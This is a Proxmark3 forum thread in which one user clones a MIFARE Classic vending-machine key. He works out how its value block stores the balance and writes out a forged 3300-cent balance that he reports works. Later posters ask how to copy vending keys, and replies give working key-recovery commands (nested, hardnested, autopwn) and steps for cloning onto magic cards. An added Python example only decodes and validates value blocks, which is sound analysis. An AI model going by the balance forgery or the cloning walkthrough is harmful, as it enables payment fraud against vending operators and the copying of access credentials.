Research, development and trades concerning the powerful Proxmark3 device.
Hello,
I already successfully cloned a Mifare classic 4k key tag from a coffee vending machine, clone verified, works without any issues
Now I would like to investigate on a more elegant way:
Now with having the original card keys, is it possible to modify the original tag to prevent the reader to reduce the remaining units on the tag?
What modifications would be required to get this done?
Thanks a lot in advance
Chimera
Below information is from original Mifare classic 4 k key tag
proxmark3> hf 14a info
UID : ff ff ff ff
ATQA : 00 02
SAK : 18 [2]
TYPE : NXP MIFARE Classic 4k | Plus 4k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
proxmark3> hf mf nested 4 0 A FFFFFFFFFFFF
--nested. sectors:40, block no: 0, key type:A, eml:n, dmp=n checktimeout=471 us
Testing known keys. Sector count=40
nested...
-----------------------------------------------
uid:xxxxxx trgbl=4 trgkey=0
Found valid key:xxxxxxxxx
-----------------------------------------------
uid:xxxxxxx trgbl=4 trgkey=1
Found valid key:xxxxxxxxxxx
-----------------------------------------------
Nested statistic:
Iterations count: 2
Time in nested: 3.921 (1.960 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| xxxxxxxxxxx | 1 | xxxxxxxxxxxxx | 1 |
|002| xxxxxxxxxxx | 1 | xxxxxxxxxxx | 1 |
|003| xxxxxxxxxxxx | 1 | xxxxxxxxxxxx | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|016| ffffffffffff | 1 | ffffffffffff | 1 |
|017| ffffffffffff | 1 | ffffffffffff | 1 |
|018| ffffffffffff | 1 | ffffffffffff | 1 |
|019| ffffffffffff | 1 | ffffffffffff | 1 |
|020| ffffffffffff | 1 | ffffffffffff | 1 |
|021| ffffffffffff | 1 | ffffffffffff | 1 |
|022| ffffffffffff | 1 | ffffffffffff | 1 |
|023| ffffffffffff | 1 | ffffffffffff | 1 |
|024| ffffffffffff | 1 | ffffffffffff | 1 |
|025| ffffffffffff | 1 | ffffffffffff | 1 |
|026| ffffffffffff | 1 | ffffffffffff | 1 |
|027| ffffffffffff | 1 | ffffffffffff | 1 |
|028| ffffffffffff | 1 | ffffffffffff | 1 |
|029| ffffffffffff | 1 | ffffffffffff | 1 |
|030| ffffffffffff | 1 | ffffffffffff | 1 |
|031| ffffffffffff | 1 | ffffffffffff | 1 |
|032| ffffffffffff | 1 | ffffffffffff | 1 |
|033| ffffffffffff | 1 | ffffffffffff | 1 |
|034| ffffffffffff | 1 | ffffffffffff | 1 |
|035| ffffffffffff | 1 | ffffffffffff | 1 |
|036| ffffffffffff | 1 | ffffffffffff | 1 |
|037| ffffffffffff | 1 | ffffffffffff | 1 |
|038| ffffffffffff | 1 | ffffffffffff | 1 |
|039| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Last edited by chimera (2018-11-22 19:47:41)
regarding this topic I just found a good starting point
Did not take much time, mission accomplished, now I am able to modify an existing keytag to put any amount onto it.
It took me 4 dumps to understand how the data gets written, see details below
a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe --> 160 cents
d2 00 00 00 2d ff ff ff d2 00 00 00 01 fe 01 fe --> 210 cents
04 01 00 00 fb fe ff ff 04 01 00 00 01 fe 01 fe --> 260 cents
68 01 00 00 97 fe ff ff 68 01 00 00 01 fe 01 fe --> 360 cents
The manufacturer is storing the current balance incl. a checksum check, but a simple check
Here is my puzzle for you --> What's the correct string for 3300 cents?
Have fun
Last edited by chimera (2018-10-30 23:42:17)
Looks like a value block...
Make a lua script for it and automate the process
Hello Iceman
Thanks a lot for your reply!
To be honest, I have no clue what a "lua script" is and how it can help to solve this puzzle. Maybe you can provide me some additional information on this, would like to take a look at this and learn something
I would like to share my approach to solve this, maybe someone can use it in the future as well.
Ok, as mentioned above I had this Mifare 4k classic keytag, the same information was stored in blocks 5 and 6, besides this nothing else was stored, of course besides block 0, but that does not matter.
a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe --> 160 cents
d2 00 00 00 2d ff ff ff d2 00 00 00 01 fe 01 fe --> 210 cents
04 01 00 00 fb fe ff ff 04 01 00 00 01 fe 01 fe --> 260 cents
68 01 00 00 97 fe ff ff 68 01 00 00 01 fe 01 fe --> 360 cents
By looking at each string I saw that the first 4 words were used to store the "current balance"
e.g a0 00 00 00
Following 4 words are reserved to store a checksum
e.g 5f ff ff ff
then again 4 words again reserved to write current balance again
e.g a0 00 00 00
for the last 4 words I have no clue, but it does not matter because they never change
e.g 01 fe 01 fe
Current Balance:
a0 --> equals in decimal to 160 cents
d2 --> equals in decimal to 210 cents
04 01 --> does not match 260 because it is 01 04 --> Looks like when 2 words are used the balance gets stored reversed
68 01 --> Proved with the 4th dump, balance with 2 words gets stored in reversed order (360 equals 01 68)
so far so good, now let us take a look at the checksum check:
E.g. the 160 cent dump --> a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe
Question is how the "5f ff ff ff" string gets calculated..... first I tried to recalculate to decimal to find any logic to calculate this, but no luck.....
Then I just looked again at all 4 dumps and concluded the following:
a "00" in the current balance always resulted in the checksum to a "ff"
a "01" in the current balance always resulted in the checksum to a "fe"
I thought maybe a sort of lookup table is used to generate the checksum. In Excel I put in the first row 255 hex numbers from 00 --> FF
In the second row again, but this time I reversed it to top side down
Like this:
0 FF
1 FE
2 FD
3 FC
.....
In the beginning I thought great I solved it because when referring to the lookup table:
a0 equals 5f, same for d2 equals 2d --> but it did not work anymore on the 4th dump, 68 did not match 97
then I solved it
Approach with the reversed lookup table was correct, but words do not get replaced 1:1, it works like this:
e.g 160 cent dump --> a0 --> check in lookup table for first byte, it is "a" or 0a results in lookup table to --> F5
remaining byte is "0" or 00, equals in lookup table to --> ff
--> Now we simply take the 2nd byte of each lookup table cross-reference to build the checksum value, it is --> 5F (2nd byte of F5 and FF)
Please verify on your own, perfectly works for each example
Now we are able to build the correct Hex string to change the current balance for example to --> 3300 cents
e4 0c 00 00 1b f3 ff ff e4 0c 00 00 01 fe 01 fe
Successfully verified, works like a charm
...how about you look up the definition of a value block in a mifare classic datasheet, I think that will help you out
Referring to the datasheet:
bytes 0-11 store the values
12-15 are reserved for the address --> for my example --> 01 fe 01 fe
When you analyze a Mifare classic keytag, which approach do you use to find out how current balance gets written?
Thanks
Chimera
almost there, read how the values are stored in a value block...
Hello Iceman,
Did refer again to the Mifare classic datasheet, now the value block definition is clear to me
Out of the datasheet:
"An example of a valid value block format for the decimal value 1234567d and the block address 17d is shown in Table 4. First, the decimal value has to be converted to the hexadecimal representation of 0012D687h. The LSByte of the hexadecimal value is stored in Byte 0, the MSByte in Byte 3. The bit inverted hexadecimal representation of the value is FFED2978h where the LSByte is stored in Byte 4 and the MSByte in Byte 7."
LSByte = byte most right
MSByte = byte most left
Also, key message is "bit inverted"
To sum this up:
Basically I came to the same conclusion with my analysis, but it took me 4 dumps to understand it somehow.
It's much smarter and faster to study the datasheet in advance
Thanks
Chimera
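To make the datasheet layout concrete, here is an added Python example. It is not Proxmark3 code and not code from anyone in this thread; it decodes and validates a MIFARE Classic value block exactly as the passage quoted above lays it out: bytes 0-3 the value (LSByte first), bytes 4-7 its bit-inverted copy, bytes 8-11 the value again, bytes 12-15 addr, ~addr, addr, ~addr. The sample blocks are the hex strings posted earlier in the thread plus the datasheet's 1234567 / address 17 example; the dump fragment is constructed with a made-up UID. It also shows what the lookup-table analysis above found by hand: the "checksum" in bytes 4-7 is just the ones' complement of each value byte (0x00 becomes 0xFF, 0xA0 becomes 0x5F), a redundancy check that catches corruption or a torn write, not a rewrite by anyone who holds the sector key.

```python
# Added example (not from this thread or the Proxmark3 project): decode and
# validate MIFARE Classic value blocks as laid out in the NXP datasheet passage
# quoted above. Sample blocks are the hex strings posted in the thread plus the
# datasheet's own example; the dump fragment is constructed.
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class ValueBlock:
    value: int    # signed 32-bit, stored little-endian (LSByte in byte 0)
    address: int  # one-byte address field from bytes 12-15 (application-defined)


def parse_value_block(block: bytes) -> ValueBlock:
    """Decode one 16-byte block; raise ValueError if any redundancy check fails."""
    if len(block) != 16:
        raise ValueError(f"value block must be 16 bytes, got {len(block)}")
    raw, inv, copy = block[0:4], block[4:8], block[8:12]
    # Bytes 4-7 must be the bitwise complement of bytes 0-3. This is the
    # "checksum" worked out by hand above: 0x00 -> 0xFF, 0x01 -> 0xFE, 0xA0 -> 0x5F.
    if bytes(b ^ 0xFF for b in raw) != inv:
        raise ValueError("bytes 4-7 are not the bit-inverted value")
    # Bytes 8-11 must repeat bytes 0-3 verbatim.
    if copy != raw:
        raise ValueError("bytes 8-11 do not repeat the value")
    # Bytes 12-15 are addr, ~addr, addr, ~addr.
    addr, addr_inv, addr2, addr_inv2 = block[12:16]
    if not (addr == addr2 and addr_inv == addr_inv2 and addr ^ addr_inv == 0xFF):
        raise ValueError("bytes 12-15 are not addr, ~addr, addr, ~addr")
    return ValueBlock(int.from_bytes(raw, "little", signed=True), addr)


def is_value_block(block: bytes) -> bool:
    """True if the block passes every check in parse_value_block."""
    try:
        parse_value_block(block)
    except ValueError:
        return False
    return True


def decode_hex(hex_string: str) -> ValueBlock:
    """Convenience wrapper for space-separated hex as printed by the Proxmark3 client."""
    return parse_value_block(bytes.fromhex(hex_string))


def scan_dump(dump: bytes) -> list[tuple[int, ValueBlock]]:
    """Walk a raw card dump 16 bytes at a time and return (block number, ValueBlock)
    for every block that is a well-formed value block."""
    found = []
    for blk_no in range(len(dump) // 16):
        chunk = dump[blk_no * 16:(blk_no + 1) * 16]
        if is_value_block(chunk):
            found.append((blk_no, parse_value_block(chunk)))
    return found


# Blocks quoted in the thread (balance in cents) and the datasheet example
# (decimal 1234567, block address 17).
THREAD_BLOCKS = {
    "a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe": 160,
    "d2 00 00 00 2d ff ff ff d2 00 00 00 01 fe 01 fe": 210,
    "04 01 00 00 fb fe ff ff 04 01 00 00 01 fe 01 fe": 260,
    "68 01 00 00 97 fe ff ff 68 01 00 00 01 fe 01 fe": 360,
    "e4 0c 00 00 1b f3 ff ff e4 0c 00 00 01 fe 01 fe": 3300,
}
DATASHEET_BLOCK = "87 d6 12 00 78 29 ed ff 87 d6 12 00 11 ee 11 ee"

# Constructed: a block whose first value byte was changed without updating the
# inverted copy or the second copy. The redundancy checks reject it, which is
# how a reader notices a torn or corrupted write.
TORN_BLOCK = "a1 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe"

# Constructed 8-block dump fragment: block 0 manufacturer data with a made-up
# UID, blocks 5 and 6 holding the 160-cent value block, default sector trailers.
MANUF = bytes.fromhex("01 02 03 04 04 08 04 00 00 00 00 00 00 00 00 00")
TRAILER = bytes.fromhex("ff ff ff ff ff ff ff 07 80 69 ff ff ff ff ff ff")
VALUE_160 = bytes.fromhex("a0 00 00 00 5f ff ff ff a0 00 00 00 01 fe 01 fe")
SAMPLE_DUMP = MANUF + bytes(16) * 2 + TRAILER + bytes(16) + VALUE_160 * 2 + TRAILER


if __name__ == "__main__":
    for hex_block, cents in THREAD_BLOCKS.items():
        vb = decode_hex(hex_block)
        print(f"{hex_block} -> value {vb.value} (expected {cents}), address {vb.address}")
    print("datasheet example:", decode_hex(DATASHEET_BLOCK))
    print("torn block accepted?", is_value_block(bytes.fromhex(TORN_BLOCK)))
    for blk_no, vb in scan_dump(SAMPLE_DUMP):
        print(f"block {blk_no}: value {vb.value}, address {vb.address}")
```

scan_dump is the kind of thing you would run over a dump file to find where an application keeps its counters. A block that passes these checks is internally consistent and nothing more: any holder of the sector key can write a fully consistent block, so a balance stored this way is only as trustworthy as the Classic keys protecting it, which is why operators who care move the balance to a backend ledger or to a card whose transactions are cryptographically authenticated.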
You did learn something new and you were curious. Excellent!
Is the OP still active? I'm on the same quest to copy a vending key, looking for what I can buy to fit in the vending machine?
anyone suggest a suitable rfid chip that fits the same slot as a mizip key hole
thanks
so I have two green keys, both give out something?
with
[usb] pm3 --> hf search
[|] Searching for ISO14443-A tag...
[+] UID: 86 91 CC xx
[+] ATQA: 00 04
[+] SAK: 09 [2]
[+] Possible types:
[+] MIFARE Mini 0.3K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Valid ISO 14443-A tag found
but what is next to dump or clone the green key
Thanks
these commands did reply with something? do I need more, or how do I write them?
hf mf chk
hf mf mad
hf mf list
i have these to write to
10pcs CUID Android App MCT Modify UID Changeable NFC 1k s50 13.56MHz Keyfob Block 0 Writable 14443A
green
Last edited by David_1 (2023-09-15 18:00:33)
Good evening David_1, hf mf -h depending on what you want to do with this key.
You need a complete dump to be able to clone it.
You must also look at the data sheet of this transponder to have the correct chip reference.
Because IC S50 not the same memory as IC S20
Last edited by fazer (2023-09-16 18:33:53)
thanks for that, I have found part of my problem, I installed into my docs on Windows... I think long path or spaces in path...
So then after following this ;-
https://www.youtube.com/watch?v=o6WOTM4D970
now I get it to dump files.. Bins so I can see the data
Strange thing is I have been issued a key for free coffee my plan to copy it is purely a test to see if I can.. my copy will gain me nothing but maybe more knowledge
Hello, have you managed to obtain a complete dump of this key?
Good day.
fazer ... my dump Bin file seems to start at zero and finish at 0208 .... 89 0A 4B 79 1B EA 7B CC I am not sure how big a complete dump is, can you help?
I used this command 'hf mf autopwn', what should I use to get a good file?
Last edited by David_1 (2023-09-17 22:31:31)
Hello, I would like to try to help you, there are dictionaries to test.
hf mf chk -h to start, see if a key can come out, then with this key try a hardnested attack. Now yes, hf mf autopwn can do the job. hf mf autopwn --1k -s 0 -a -k FFFFFFFFFFFF -f mfc_default_keys here is an example. Try using the --help of each command, there are examples.
Good day.
I did 6 dumps last night, most are similar... but not identical. Can I PM you my email and send them to you? or you email me please
Last edited by David_1 (2023-09-18 09:30:04)
[usb] pm3 --> hf mf chk
[=] Start check for keys...
[=] .................................
[=] time in checkkeys 8 seconds
[=] testing to read key B...
[=] Sector: 0, First block: 0, Last block: 3, Num of blocks: 4
[=] Reading sector trailer
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | ------------ | 0
[+] 001 | 007 | ------------ | 0 | ------------ | 0
[+] 002 | 011 | ------------ | 0 | ------------ | 0
[+] 003 | 015 | ------------ | 0 | ------------ | 0
[+] 004 | 019 | ------------ | 0 | ------------ | 0
[+] 005 | 023 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 006 | 027 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 007 | 031 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 008 | 035 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 009 | 039 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 010 | 043 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 011 | 047 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 012 | 051 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 013 | 055 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 014 | 059 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] 015 | 063 | 5C8FF9990DA2 | 1 | D01AFEEB890A | 1
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more details
Re, it's a good start, you now have what you need to do a hardnested attack or hf mf autopwn --1k -s 0 -a -k A0A1A2A3A4A5 -f mfc_default_keys for example. Concerning the exchange of emails, why not continue here, that way a person who wants to can also help if they want to.
there is something strange in this dump because normally the mini has 5 sectors x 4 blocks/sector x 16 bytes/block = 320 bytes.
does your pm3 have the latest update? <<hw version>>
Last edited by fazer (2023-09-18 15:51:36)
yes I think iceman got updated last week
mine was done yesterday
[usb] pm3 --> hf mf csetuid --u 8691CCB4 --atqa 0004 --sak 09
[#] wupC1 error
[=] couldn't get old data. Will write over the last bytes of block 0
[+] new block 0... 8691CCB46F0904000000000000000000
[#] wupC1 error
[!!] Can't set UID. error -1
what's up with that?
Hello, look here you will undoubtedly find your answer.
good evening, try this cmd to try to get out the missing keys.
hf mf hardnested --blk 3 -a -k A0A1A2A3A4A5 --tblk 3 --tb # for key B of blk 3.
If ok, do the same for the rest.
of course with the badge on pm3.
Last edited by fazer (2023-09-20 17:52:37)
sorry got distracted on another mission lol
newcard
[usb] pm3 --> hf mf rdsc -k a0a1a2a3a4a5 -s 0 -v
[=] # | sector 00 / 0x00 | ascii
[=] ----+-------------------------------------------------+-----------------
[=] 0 | 86 91 CC B4 6F 89 04 00 C8 39 00 20 00 00 00 19 | ....o....9. ....
[=] 1 | 62 00 48 88 49 88 4A 88 4B 88 00 00 00 00 00 00 | b.H.I.J.K.......
[=] 2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=] 3 | 00 00 00 00 00 00 78 77 88 C1 00 00 00 00 00 00 | ......xw........
[=] -------------------------- Sector trailer decoder --------------------------
[=] key A........ 000000000000
[=] acr.......... 787788
[=] user / gpb... c1
[=] key B........ 000000000000
[=]
[=] # | access rights
[=] ----+-----------------------------------------------------------------------
[=] 0 | read AB; write B
[=] 1 | read AB; write B
[=] 2 | read AB; write B
[=] 3 | write A by B; read ACCESS by AB; write ACCESS by B; write B by B
[=] ----------------------------------------------------------------------------
[usb] pm3 -->
this is a new problem but with the same bought writable cards, I do not seem able to write sector zero
[usb] pm3 --> hf mf cload -f hf-mf-C459346E-dump-001.eml
[+] loaded 1024 bytes from text file `hf-mf-C459346E-dump-001.eml`
[=] Copying to magic gen1a card
[=] .[#] wupC1 error
[!] Can't set magic card block: 0
[usb] pm3 --> hf mf cload --emu
[=] Start upload to emulator memory
[=] .[#] wupC1 error
[!] Can't set magic card block: 0
anyone help ?
tried?
hf mf mad
thank you, will try later, I killed my first card today,
with this command trying to write block 0 for a test
hf mf wrbl --force --blk 0 -d 000102030405060708090a0b0c0d0e0f
can it be recovered ?
Hello, you say I killed my first card, what type of card & why this blk 0 command for testing? I don't really understand what you want to clone, a card, so start with the uid & set the rest. Now get it back maybe to see what type of card.
sorry, the card I killed is the one I am trying to make the same as the original..
10pcs CUID Android App MCT Modify UID Changeable NFC 1k s50 13.56MHz Keyfob Block 0 Writable 14443A
3 Sold
£4.32 / lot (10 Pieces)
43 pence lol, it's not a big value item but it's now not readable or writable, just wondered if there was another command to reset it before it goes in the bin...
Last edited by David_1 (2023-10-02 09:50:07)
Higher up in your hf search it tells you MIFARE Mini 0.3K
[=] proprietary non iso14443-4 card found, RATS not supported
So if I understand correctly you are trying to clone this card with a UID Changeable NFC 1k s50, it's not at all the same memory so the problem may come from there
sorry been waiting for post from China